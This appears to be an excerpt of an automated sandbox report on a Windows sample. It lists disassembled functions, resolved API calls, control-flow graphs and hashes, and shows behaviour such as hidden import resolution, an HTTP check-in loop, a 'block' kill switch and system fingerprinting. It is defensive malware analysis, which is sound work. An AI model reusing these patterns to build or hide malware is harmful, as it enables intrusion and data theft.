                              • GetProcAddress.KERNEL32(75900000,0142C9B0), ref: 008B9FE2
                              • GetProcAddress.KERNEL32(75900000,0142CA40), ref: 008B9FFA
                              • GetProcAddress.KERNEL32(75900000,014157C8), ref: 008BA013
                              • GetProcAddress.KERNEL32(75900000,01415A68), ref: 008BA02B
                              • LoadLibraryA.KERNEL32(0142CB18,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA03D
                              • LoadLibraryA.KERNEL32(0142CA58,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA04E
                              • LoadLibraryA.KERNEL32(0142C9C8,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA060
                              • LoadLibraryA.KERNEL32(0142CAD0,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA072
                              • LoadLibraryA.KERNEL32(0142CBD8,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA083
                              • LoadLibraryA.KERNEL32(0142CC08,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA095
                              • LoadLibraryA.KERNEL32(0142CCE0,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA0A7
                              • LoadLibraryA.KERNEL32(0142CE00,?,008B5CA3,008C0AEB,?,?,?,?,?,?,?,?,?,?,008C0AEA,008C0AE3), ref: 008BA0B8
                              • GetProcAddress.KERNEL32(75FD0000,014156C8), ref: 008BA0DA
                              • GetProcAddress.KERNEL32(75FD0000,0142CD40), ref: 008BA0F2
                              • GetProcAddress.KERNEL32(75FD0000,01428700), ref: 008BA10A
                              • GetProcAddress.KERNEL32(75FD0000,0142CC80), ref: 008BA123
                              • GetProcAddress.KERNEL32(75FD0000,01415888), ref: 008BA13B
                              • GetProcAddress.KERNEL32(734B0000,0141ADA8), ref: 008BA160
                              • GetProcAddress.KERNEL32(734B0000,01415788), ref: 008BA179
                              • GetProcAddress.KERNEL32(734B0000,0141AE20), ref: 008BA191
                              • GetProcAddress.KERNEL32(734B0000,0142CCF8), ref: 008BA1A9
                              • GetProcAddress.KERNEL32(734B0000,0142CDB8), ref: 008BA1C2
                              • GetProcAddress.KERNEL32(734B0000,014159A8), ref: 008BA1DA
                              • GetProcAddress.KERNEL32(734B0000,01415908), ref: 008BA1F2
                              • GetProcAddress.KERNEL32(734B0000,0142CDD0), ref: 008BA20B
                              • GetProcAddress.KERNEL32(763B0000,01415868), ref: 008BA22C
                              • GetProcAddress.KERNEL32(763B0000,014157E8), ref: 008BA244
                              • GetProcAddress.KERNEL32(763B0000,0142CD70), ref: 008BA25D
                              • GetProcAddress.KERNEL32(763B0000,0142CE18), ref: 008BA275
                              • GetProcAddress.KERNEL32(763B0000,01415A48), ref: 008BA28D
                              • GetProcAddress.KERNEL32(750F0000,0141B0C8), ref: 008BA2B3
                              • GetProcAddress.KERNEL32(750F0000,0141AE48), ref: 008BA2CB
                              • GetProcAddress.KERNEL32(750F0000,0142CD88), ref: 008BA2E3
                              • GetProcAddress.KERNEL32(750F0000,014156E8), ref: 008BA2FC
                              • GetProcAddress.KERNEL32(750F0000,01415808), ref: 008BA314
                              • GetProcAddress.KERNEL32(750F0000,0141B0F0), ref: 008BA32C
                              • GetProcAddress.KERNEL32(75A50000,0142CCC8), ref: 008BA352
                              • GetProcAddress.KERNEL32(75A50000,01415708), ref: 008BA36A
                              • GetProcAddress.KERNEL32(75A50000,01428820), ref: 008BA382
                              • GetProcAddress.KERNEL32(75A50000,0142CC98), ref: 008BA39B
                              • GetProcAddress.KERNEL32(75A50000,0142CDA0), ref: 008BA3B3
                              • GetProcAddress.KERNEL32(75A50000,01415A88), ref: 008BA3CB
                              • GetProcAddress.KERNEL32(75A50000,01415728), ref: 008BA3E4
                              • GetProcAddress.KERNEL32(75A50000,0142CD58), ref: 008BA3FC
                              • GetProcAddress.KERNEL32(75A50000,0142CDE8), ref: 008BA414
                              • GetProcAddress.KERNEL32(75070000,014158A8), ref: 008BA436
                              • GetProcAddress.KERNEL32(75070000,0142CC68), ref: 008BA44E
                              • GetProcAddress.KERNEL32(75070000,0142CD10), ref: 008BA466
                              • GetProcAddress.KERNEL32(75070000,0142CCB0), ref: 008BA47F
                              • GetProcAddress.KERNEL32(75070000,0142CD28), ref: 008BA497
                              • GetProcAddress.KERNEL32(74E50000,01415848), ref: 008BA4B8
                              • GetProcAddress.KERNEL32(74E50000,01415AA8), ref: 008BA4D1
                              • GetProcAddress.KERNEL32(75320000,01415968), ref: 008BA4F2
                              • GetProcAddress.KERNEL32(75320000,0142C908), ref: 008BA50A
                              • GetProcAddress.KERNEL32(6F060000,01415748), ref: 008BA530
                              • GetProcAddress.KERNEL32(6F060000,014159C8), ref: 008BA548
                              • GetProcAddress.KERNEL32(6F060000,014157A8), ref: 008BA560
                              • GetProcAddress.KERNEL32(6F060000,0142C950), ref: 008BA579
                              • GetProcAddress.KERNEL32(6F060000,01415768), ref: 008BA591
                              • GetProcAddress.KERNEL32(6F060000,01415828), ref: 008BA5A9
                              • GetProcAddress.KERNEL32(6F060000,014159E8), ref: 008BA5C2
                              • GetProcAddress.KERNEL32(6F060000,014158C8), ref: 008BA5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 008BA5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 008BA607
                              • GetProcAddress.KERNEL32(74E00000,0142C710), ref: 008BA629
                              • GetProcAddress.KERNEL32(74E00000,01428710), ref: 008BA641
                              • GetProcAddress.KERNEL32(74E00000,0142C890), ref: 008BA659
                              • GetProcAddress.KERNEL32(74E00000,0142C7D0), ref: 008BA672
                              • GetProcAddress.KERNEL32(74DF0000,014158E8), ref: 008BA693
                              • GetProcAddress.KERNEL32(6FA90000,0142C728), ref: 008BA6B4
                              • GetProcAddress.KERNEL32(6FA90000,01415A08), ref: 008BA6CD
                              • GetProcAddress.KERNEL32(6FA90000,0142C920), ref: 008BA6E5
                              • GetProcAddress.KERNEL32(6FA90000,0142C7E8), ref: 008BA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 57bf4608da8d93605e2bbcc5b21d75af4a6af3517653e243379657c082bc42e0
                              • Instruction ID: b047b59bb93cd809c30fab4b5c091d8d34b3240aade3b9ba668fb009df45a374
                              • Opcode Fuzzy Hash: 57bf4608da8d93605e2bbcc5b21d75af4a6af3517653e243379657c082bc42e0
                              • Instruction Fuzzy Hash: E5621EBA500280AFC354DFE8EDD89563BF9F76C301715851EA609CB264D639B883DF62
                              Function 008A6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 8a6280-8a630b call 8ba7a0 call 8a47b0 call 8ba740 InternetOpenA StrCmpCA 1040 8a630d 1033->1040 1041 8a6314-8a6318 1033->1041 1040->1041 1042 8a6509-8a6525 call 8ba7a0 call 8ba800 * 2 1041->1042 1043 8a631e-8a6342 InternetConnectA 1041->1043 1062 8a6528-8a652d 1042->1062 1045 8a6348-8a634c 1043->1045 1046 8a64ff-8a6503 InternetCloseHandle 1043->1046 1048 8a635a 1045->1048 1049 8a634e-8a6358 1045->1049 1046->1042 1051 8a6364-8a6392 HttpOpenRequestA 1048->1051 1049->1051 1052 8a6398-8a639c 1051->1052 1053 8a64f5-8a64f9 InternetCloseHandle 1051->1053 1055 8a639e-8a63bf InternetSetOptionA 1052->1055 1056 8a63c5-8a6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 8a642c-8a644b call 8b8940 1056->1058 1059 8a6407-8a6427 call 8ba740 call 8ba800 * 2 1056->1059 1067 8a64c9-8a64e9 call 8ba740 call 8ba800 * 2 1058->1067 1068 8a644d-8a6454 1058->1068 1059->1062 1067->1062 1071 8a6456-8a6480 InternetReadFile 1068->1071 1072 8a64c7-8a64ef InternetCloseHandle 1068->1072 1076 8a648b 1071->1076 1077 8a6482-8a6489 1071->1077 1072->1053 1076->1072 1077->1076 1078 8a648d-8a64c5 call 8ba9b0 call 8ba8a0 call 8ba800 1077->1078 1078->1071
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                                • Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • InternetOpenA.WININET(008C0DFE,00000001,00000000,00000000,00000000), ref: 008A62E1
                              • StrCmpCA.SHLWAPI(?,0142F028), ref: 008A6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008A63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008A63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008A63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008A646D
                              • InternetCloseHandle.WININET(00000000), ref: 008A64EF
                              • InternetCloseHandle.WININET(00000000), ref: 008A64F9
                              • InternetCloseHandle.WININET(00000000), ref: 008A6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: ae6bb9928502593783f9b1def8d51f1fc93205326b928f50ec5554f9e29ebe3b
                              • Instruction ID: a4b8680b129c93f3650c1ea45a0076ab20f1f1ffdf414a0a928a6a57f8b1d929
                              • Opcode Fuzzy Hash: ae6bb9928502593783f9b1def8d51f1fc93205326b928f50ec5554f9e29ebe3b
                              • Instruction Fuzzy Hash: A5713071A00218ABEF24DBE4CC95FEE7774FB45700F108158F509AB694DBB46A85CF52
                              Function 008B5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 8b5510-8b5577 call 8b5ad0 call 8ba820 * 3 call 8ba740 * 4 1106 8b557c-8b5583 1090->1106 1107 8b55d7-8b564c call 8ba740 * 2 call 8a1590 call 8b52c0 call 8ba8a0 call 8ba800 call 8baad0 StrCmpCA 1106->1107 1108 8b5585-8b55b6 call 8ba820 call 8ba7a0 call 8a1590 call 8b51f0 1106->1108 1134 8b5693-8b56a9 call 8baad0 StrCmpCA 1107->1134 1137 8b564e-8b568e call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1107->1137 1124 8b55bb-8b55d2 call 8ba8a0 call 8ba800 1108->1124 1124->1134 1139 8b56af-8b56b6 1134->1139 1140 8b57dc-8b5844 call 8ba8a0 call 8ba820 * 2 call 8a1670 call 8ba800 * 4 call 8b6560 call 8a1550 1134->1140 1137->1134 1142 8b57da-8b585f call 8baad0 StrCmpCA 1139->1142 1143 8b56bc-8b56c3 1139->1143 1271 8b5ac3-8b5ac6 1140->1271 1161 8b5991-8b59f9 call 8ba8a0 call 8ba820 * 2 call 8a1670 call 8ba800 * 4 call 8b6560 call 8a1550 1142->1161 1162 8b5865-8b586c 1142->1162 1146 8b571e-8b5793 call 8ba740 * 2 call 8a1590 call 8b52c0 call 8ba8a0 call 8ba800 call 8baad0 StrCmpCA 1143->1146 1147 8b56c5-8b5719 call 8ba820 call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1143->1147 1146->1142 1250 8b5795-8b57d5 call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1146->1250 1147->1142 1161->1271 1167 8b598f-8b5a14 call 8baad0 StrCmpCA 1162->1167 1168 8b5872-8b5879 1162->1168 1197 8b5a28-8b5a91 call 8ba8a0 call 8ba820 * 2 call 8a1670 call 8ba800 * 4 call 8b6560 call 8a1550 1167->1197 1198 8b5a16-8b5a21 Sleep 1167->1198 1175 8b587b-8b58ce call 8ba820 call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1168->1175 1176 8b58d3-8b5948 call 8ba740 * 2 call 8a1590 call 8b52c0 call 8ba8a0 call 8ba800 call 8baad0 StrCmpCA 1168->1176 1175->1167 1176->1167 1276 8b594a-8b598a call 8ba7a0 call 8a1590 call 8b51f0 call 8ba8a0 call 8ba800 1176->1276 1197->1271 1198->1106 1250->1142 1276->1167
                              APIs
                                • Part of subcall function 008BA820: lstrlen.KERNEL32(008A4F05,?,?,008A4F05,008C0DDE), ref: 008BA82B
                                • Part of subcall function 008BA820: lstrcpy.KERNEL32(008C0DDE,00000000), ref: 008BA885
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5857
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008B51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5228
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5318
                                • Part of subcall function 008B52C0: lstrlen.KERNEL32(00000000), ref: 008B532F
                                • Part of subcall function 008B52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 008B5364
                                • Part of subcall function 008B52C0: lstrlen.KERNEL32(00000000), ref: 008B5383
                                • Part of subcall function 008B52C0: lstrlen.KERNEL32(00000000), ref: 008B53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 008B5A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 92b12320cc6435a60573887e74b9108a62fa95a75e633460e1983815a2edb3b7
                              • Instruction ID: 7147cdb2dd3bf1e165b5ea38c08904ec23eeb0854f25ed2092bef37a5877aa11
                              • Opcode Fuzzy Hash: 92b12320cc6435a60573887e74b9108a62fa95a75e633460e1983815a2edb3b7
                              • Instruction Fuzzy Hash: D8E11671910504AADB18FBA8DC96EED7778FF54300F508528B506E6691EF346B09CBA3
                              Function 008B17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 8b17a0-8b17cd call 8baad0 StrCmpCA 1304 8b17cf-8b17d1 ExitProcess 1301->1304 1305 8b17d7-8b17f1 call 8baad0 1301->1305 1309 8b17f4-8b17f8 1305->1309 1310 8b17fe-8b1811 1309->1310 1311 8b19c2-8b19cd call 8ba800 1309->1311 1313 8b199e-8b19bd 1310->1313 1314 8b1817-8b181a 1310->1314 1313->1309 1315 8b1849-8b1858 call 8ba820 1314->1315 1316 8b18cf-8b18e0 StrCmpCA 1314->1316 1317 8b198f-8b1999 call 8ba820 1314->1317 1318 8b18ad-8b18be StrCmpCA 1314->1318 1319 8b1821-8b1830 call 8ba820 1314->1319 1320 8b187f-8b1890 StrCmpCA 1314->1320 1321 8b185d-8b186e StrCmpCA 1314->1321 1322 8b1913-8b1924 StrCmpCA 1314->1322 1323 8b1932-8b1943 StrCmpCA 1314->1323 1324 8b18f1-8b1902 StrCmpCA 1314->1324 1325 8b1951-8b1962 StrCmpCA 1314->1325 1326 8b1970-8b1981 StrCmpCA 1314->1326 1327 8b1835-8b1844 call 8ba820 1314->1327 1315->1313 1331 8b18ec 1316->1331 1332 8b18e2-8b18e5 1316->1332 1317->1313 1329 8b18ca 1318->1329 1330 8b18c0-8b18c3 1318->1330 1319->1313 1350 8b189e-8b18a1 1320->1350 1351 8b1892-8b189c 1320->1351 1348 8b187a 1321->1348 1349 8b1870-8b1873 1321->1349 1335 8b1930 1322->1335 1336 8b1926-8b1929 1322->1336 1337 8b194f 1323->1337 1338 8b1945-8b1948 1323->1338 1333 8b190e 1324->1333 1334 8b1904-8b1907 1324->1334 1339 8b196e 1325->1339 1340 8b1964-8b1967 1325->1340 1342 8b198d 1326->1342 1343 8b1983-8b1986 1326->1343 1327->1313 1329->1313 1330->1329 1331->1313 1332->1331 1333->1313 1334->1333 1335->1313 1336->1335 1337->1313 1338->1337 1339->1313 1340->1339 1342->1313 1343->1342 1348->1313 1349->1348 1355 8b18a8 1350->1355 1351->1355 1355->1313
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 008B17C5
                              • ExitProcess.KERNEL32 ref: 008B17D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: a3cd3b5b12fcf5a66055603154e6228c8fda2e4bda910b78dce0376374b3e096
                              • Instruction ID: 1314b82fbd4ddff3723e26d966009919ab6432b3cca691a61924f28179c756f3
                              • Opcode Fuzzy Hash: a3cd3b5b12fcf5a66055603154e6228c8fda2e4bda910b78dce0376374b3e096
                              • Instruction Fuzzy Hash: C15148B4A00249EBCF04DFA4D9A8AFE7BB5FB44744F908058E516EB340D774E942CB62
                              Function 008B7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 8b7500-8b754a GetWindowsDirectoryA 1357 8b754c 1356->1357 1358 8b7553-8b75c7 GetVolumeInformationA call 8b8d00 * 3 1356->1358 1357->1358 1365 8b75d8-8b75df 1358->1365 1366 8b75fc-8b7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 8b75e1-8b75fa call 8b8d00 1365->1367 1368 8b7619-8b7626 call 8ba740 1366->1368 1369 8b7628-8b7658 wsprintfA call 8ba740 1366->1369 1367->1365 1377 8b767e-8b768e 1368->1377 1369->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008B7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008B757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B760A
                              • wsprintfA.USER32 ref: 008B7640
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: ecb2e817fe77180bcdf13652f22c6df44b58ee32fd8cdaafb3dc4e51906cdbe5
                              • Instruction ID: 6db6e486095ea2a1ceb18dc8468d69eb0c9129546fa8ba9372673b472ee49154
                              • Opcode Fuzzy Hash: ecb2e817fe77180bcdf13652f22c6df44b58ee32fd8cdaafb3dc4e51906cdbe5
                              • Instruction Fuzzy Hash: 844181B1904348ABDB10DF98DC95BDEBBB8FB58704F140199F509AB280DB746A44CBA6
                              Function 008B69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420408), ref: 008B98A1
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420618), ref: 008B98BA
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420630), ref: 008B98D2
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420678), ref: 008B98EA
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,014206A8), ref: 008B9903
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,014286D0), ref: 008B991B
